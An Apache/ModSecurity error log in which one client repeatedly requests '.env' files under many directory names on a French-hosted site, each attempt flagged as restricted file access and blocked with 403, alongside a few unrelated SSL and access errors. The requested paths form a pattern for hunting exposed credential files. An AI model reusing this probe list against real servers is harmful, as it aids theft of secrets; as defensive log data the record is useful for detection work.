[Mon May 11 17:36:21.409635 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agH3dVV4kyjgo4bQBUhueQAAANM"]
[Mon May 11 17:36:21.409862 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agH3dVV4kyjgo4bQBUhueQAAANM"]
[Mon May 11 17:36:21.410118 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backups/.env"] [unique_id "agH3dVV4kyjgo4bQBUhueQAAANM"]
[Mon May 11 17:36:21.604351 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuegAAANM"]
[Mon May 11 17:36:21.604573 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuegAAANM"]
[Mon May 11 17:36:21.604836 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/old/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuegAAANM"]
[Mon May 11 17:36:21.843507 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuewAAANM"]
[Mon May 11 17:36:21.843726 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuewAAANM"]
[Mon May 11 17:36:21.843974 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/tmp/.env"] [unique_id "agH3dVV4kyjgo4bQBUhuewAAANM"]
[Mon May 11 17:36:22.055222 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufAAAANM"]
[Mon May 11 17:36:22.055453 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufAAAANM"]
[Mon May 11 17:36:22.055714 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/temp/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufAAAANM"]
[Mon May 11 17:36:22.332886 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufQAAANM"]
[Mon May 11 17:36:22.333117 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufQAAANM"]
[Mon May 11 17:36:22.333398 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/lab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufQAAANM"]
[Mon May 11 17:36:22.519624 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufwAAANM"]
[Mon May 11 17:36:22.519844 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufwAAANM"]
[Mon May 11 17:36:22.520085 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agH3dlV4kyjgo4bQBUhufwAAANM"]
[Mon May 11 17:36:22.732261 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agH3dlV4kyjgo4bQBUhugQAAANM"]
[Mon May 11 17:36:22.732530 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agH3dlV4kyjgo4bQBUhugQAAANM"]
[Mon May 11 17:36:22.732887 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agH3dlV4kyjgo4bQBUhugQAAANM"]
[Mon May 11 17:36:22.904527 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agH3dlV4kyjgo4bQBUhuhwAAANM"]
[Mon May 11 17:36:22.904846 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agH3dlV4kyjgo4bQBUhuhwAAANM"]
[Mon May 11 17:36:22.905256 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agH3dlV4kyjgo4bQBUhuhwAAANM"]
[Mon May 11 17:36:23.080119 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiAAAANM"]
[Mon May 11 17:36:23.080384 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiAAAANM"]
[Mon May 11 17:36:23.080645 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiAAAANM"]
[Mon May 11 17:36:23.297693 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuigAAANM"]
[Mon May 11 17:36:23.297926 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuigAAANM"]
[Mon May 11 17:36:23.298196 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuigAAANM"]
[Mon May 11 17:36:23.536982 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiwAAANM"]
[Mon May 11 17:36:23.537223 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiwAAANM"]
[Mon May 11 17:36:23.537506 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agH3d1V4kyjgo4bQBUhuiwAAANM"]
[Mon May 11 17:36:23.739288 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agH3d1V4kyjgo4bQBUhujQAAANM"]
[Mon May 11 17:36:23.739516 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agH3d1V4kyjgo4bQBUhujQAAANM"]
[Mon May 11 17:36:23.739745 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agH3d1V4kyjgo4bQBUhujQAAANM"]
[Mon May 11 17:36:23.840846 2026] [ssl:error] [pid 1411099:tid 1411119] (EAI 2)Name or service not known: [client 138.68.60.186:60642] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 17:36:23.840881 2026] [ssl:error] [pid 1411099:tid 1411119] AH01941: stapling_renew_response: responder error
[Mon May 11 17:36:23.887254 2026] [authz_core:error] [pid 1411201:tid 1411250] [client 176.120.22.46:57501] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/widgets/error_log, referer: http://www.labaujue.com/wp-includes/widgets/
[Mon May 11 17:36:24.065547 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agH3eFV4kyjgo4bQBUhukQAAANM"]
[Mon May 11 17:36:24.065773 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agH3eFV4kyjgo4bQBUhukQAAANM"]
[Mon May 11 17:36:24.066040 2026] [security2:error] [pid 1416109:tid 1416149] [client 18.144.25.17:40682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agH3eFV4kyjgo4bQBUhukQAAANM"]
